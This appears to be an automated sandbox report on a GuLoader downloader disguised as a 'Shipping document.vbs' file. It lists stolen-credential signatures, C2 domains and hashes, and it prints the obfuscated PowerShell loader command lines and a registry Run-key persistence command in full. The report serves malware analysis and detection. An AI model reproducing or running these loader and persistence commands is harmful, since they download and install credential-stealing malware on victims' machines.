Xip.ochmakro aeSmovsetd,ecolor)Hng,nde ');Xylyl (Mikado 'Klatvas$ryg,adeg StaveslYeom,nloAutomobbBestia a un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 tcp

Files

memory/2232-4-0x000007FEF5E7E000-0x000007FEF5E7F000-memory.dmp

memory/2232-5-0x000000001B540000-0x000000001B822000-memory.dmp

memory/2232-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

memory/2232-7-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

memory/2232-9-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

memory/2232-8-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\62FTBH5A1A3YLDVCCVCZ.temp

MD5 6b2021e9e801b35d751d7774787e88d9
SHA1 a4718e958efa7c830b37dc1b5bc8d77902cc588f
SHA256 2b11bf60370618bf5806552d9d0515c04bfdb0c0d1db137621cd8cd9bb77d3fc
SHA512 7b62ce57d669f9e07c8d239ef97e23d3de8625cc640a21a45519af346cdf6f5f976d4b74e3f630286e66c6029a578192e28178a5c85336bb5c0b5436100ac683

C:\Users\Admin\AppData\Roaming\Contributors.Pap

MD5 6d3d810b1b531a393dd8a200f17378b8
SHA1 bc31c057297d2b467a46d843030f1ff377f55f1e
SHA256 786447c3a5269cec661eb9e7bea51a58df805afaceb116677ff1974cc0d6d7df
SHA512 a77ecb7cc1d0bb183fdef43747f7156bd72e5fcb32e2e8c7671a926707b313245e08b682ce03b6b862f9f4ff1f62cf566d98fbde3384c67b60c0a2cb8dcbf358

memory/2232-15-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

memory/2232-16-0x000007FEF5E7E000-0x000007FEF5E7F000-memory.dmp

memory/2232-17-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

memory/1848-18-0x0000000006480000-0x0000000007971000-memory.dmp

memory/2768-20-0x0000000000890000-0x00000000018F2000-memory.dmp

memory/2232-27-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 17:15

Reported

2024-05-22 17:18

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Slidfladerne = "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\\Rewets\\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 712 wrote to memory of 2508 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 712 wrote to memory of 2508 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2508 wrote to memory of 1232 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2508 wrote to memory of 1232 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 712 wrote to memory of 2728 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 712 wrote to memory of 2728 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 3956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 3956 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3956 wrote to memory of 4740 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3956 wrote to memory of 4740 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3956 wrote to memory of 4740 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3956 wrote to memory of 2780 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3956 wrote to memory of 2780 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3956 wrote to memory of 2780 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3956 wrote to memory of 2780 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3956 wrote to memory of 2780 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2616 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 2616 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 2616 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2616 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2616 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2616 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2780 wrote to memory of 2204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 2100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 4052 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 4052 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 4052 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 4052 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 5112 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 5112 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 5112 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2780 wrote to memory of 5112 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undialyzeds = 1;$Forespeech='Sub';$Forespeech+='strin';$Forespeech+='g';Function Mikado($Firebolted){$Martyrologic=$Firebolted.Length-$Undialyzeds;For($Femalizes49=7;$Femalizes49 -lt $Martyrologic;$Femalizes49+=8){$Trompetdyrenes+=$Firebolted.$Forespeech.Invoke( $Femalizes49, $Undialyzeds);}$Trompetdyrenes;}function Xylyl($nougats){. ($Sprinklervsken) ($nougats);}$Guilts=Mikado 'MisbirtMm alretoOblongiz MustafiEnglevilAfkol,nl Larigoa.alteri/Metagna5 Stab.l. egions0Asbku,h Untaun.(BelejriWAssociaiUdviklin bagestdRutscheoGejstliwSagsgansBlokpol IndonesNLaboratTo forme L.isure1,ladtan0 Ran.or.Apertne0rodknol;Sultegr algesi.W S,riveiAddi,ten Lin eb6Do.atio4Elaph.d;St.vnsb Enc,untxSeed ng6 ,ogica4Adiposi;Kvindes FutilizrRugbrdsv Transi: Nongol1Bun tsd2 Denoun1Bortdmm. Me,red0Opkalds)Delites arbejdsGPalaeogeArchesic,ekognoktkkendeoUpassel/Rouil.e2Spirant0Photote1Slutpun0eftertr0 Stumbl1Hu dehu0Recitat1Hjlpe,n elsenfFGossa ei SimultrUberegneIndeksefWharfraoAftalevx To.sio/Forvalt1Painles2Drivers1I,dsmig.Cocksho0Tantiem ';$Fuldbragtes=Mikado ' ImerinUForegris Redeareti.balerJunkboa-Bon.sesACatchm gSi kerheModer,inForrykttPletter ';$Spinituberculate=Mikado ' BrndemhIndividtindsendt BankospPau,eris.nnovat:Balleti/Fossaeu/V,lfundc Al inaa OddlegdKostskoeBlokadenSeend saAmatrskdCult kle GummibrOrangeaeO,tendegBogiemaaNy etipl.ositiooCardioms.envisn.Debtorsc GravhjoNonpuebm Endoph/Ti,glysTKlbebaaoMisderiicarcasslAdresseeFilmogrtSemicelp Fil,inaSjlsr.apEkspedii .aabenr Ol,gis.Rooti.rdRispendeHumpssaptevarmel Geestso LgnersyInbitsb>Universh,ogonghtSy,kemat An,etlp Chempa:Kommpre/ Melipo/ Anderum HysteraDiabetedKammendiJefest.bVetiveraThrowworStaalvroPlacenthInnuendiGlitr tl Paral.aFortonel Glairea,mmutabt,ontradwNonprodoHunde l. Futurod tudercu Mudredcover,igkDe.angsd Macrocnpho.osks verflu.Tbrudsso To.seirRadiovigBrasero/VolitioaVrvlehilAllainelTotalsy/PhrynidTEtymo oo Roque.i,nterkolFilialseAfviklit UdaandpJentjenaHjertevpChackeri DividerEskadre.AntisufdNonst meCater.npbackbitlFreestooUnpoisey,urstpa ';$Smedningens=Mikado 'Unbutto> Indici ';$Sprinklervsken=Mikado 'KontokbiVolumeteHemihe.x Slingr ';$Cagot='Dockizations60';$Tilskring = Mikado ' K,stnieJan.lerc Bra.dahHande.so Chapta Expansi%Vir uela Elatc p RoughcpPanegy,dsellehyaD.imonitinitialaAchroni%Novelet\ osenstCinhivemo DissennK nnikktParfumergraver,iLsegldeb Cod.scu Starquthamrendo Gas etr Rve agsOlibanu.EpichilPHopeiteaUudslukpscuttl. Th,race&Brysth,&Outrefo El borae ProgracBrnesprhHulsle o Witlos plackletAmphirh ';Xylyl (Mikado 'Endolys$CimbrisgWispliklVirkeliopolitikbD,trugcaBgede elKotylef: Dext,if Bl.stoiKroatisrSnow owe ,ignalbParenthoH,idlgeoSenioretDishono=.vyunde(Se nmshc JunglemStarrind Flush. Snuptag/Unenwovc.cicula Supergr$EnsformTR sideniSedlersl Essayes TrammikBotulinrEphebeuiAr.ejdsn DerivegScrimwi)Subclam ');Xylyl (Mikado 'Hyper,c$ Erotisg .rikkelSubd.ntoMesa.icb Blokada Sy,axalIrascib:Bug,hypDBice,tri BagtrasJenmakekMicr tyoTransakgOp,oegerFakticia Jeaporf KroniniViljenssFru.tlekSjattefelegemulsj.gtpro=Jellstu$PamphleSForsinkpChalleni MegalenToralhaiGennembtHumo riuSubd,vibUneffigeSk,ltonr.gsvinbc IlioisuAr,enohlMass oraGent getAcalycae F lset. VenstrsAlmenvepBor,deslEls,liniTopske.t.layful(Thermof$Ud.andsS Car.urmGalvanoeShillald P ogrenMateriaiDurriesnA.arerngEjendomeProtoclnStueflus reatta)Indisti ');$Spinituberculate=$Diskografiskes[0];$Illegitimated= (Mikado ' Immite$o ercrigEngramblDraughtoWharfsibShippi aRauwolflSh mpoo:Li.ehooE UnsecllTourellePenitencAtionertAntimonropflgnioTruebludIndavlei Tav.rna InterilInklu,eyOmvekslzSedimene DebatsrTi skri=ReekspoNNedmejneS ltierw Rustvo-Alchem O ntioxibFlja,tejEnchanteSchizo c Pourbot E curs su,keneSNon,oveyMicawbesSaturnitHormonoeOverprim undive.TrsklerNmateriaeNringentTythesr.T,pefliWNyreligeM,nkesmbDeaminaCNaringil stubblirhagioneCheilodnBrugermt');$Illegitimated+=$fireboot[1];Xylyl ($Illegitimated);Xylyl (Mikado 'Englify$Dift,ngE Orni hlVilkaareTr,nsmicSelvk,et aggadirUndtageoTraadkudGentiliiPortr,tapalliatlSor.kjoyTilstrbzEksercie Draftsrunnomin.AfsendeH Rapp leAeroplaaPrangerdPersoniePlanc.er Snitsls 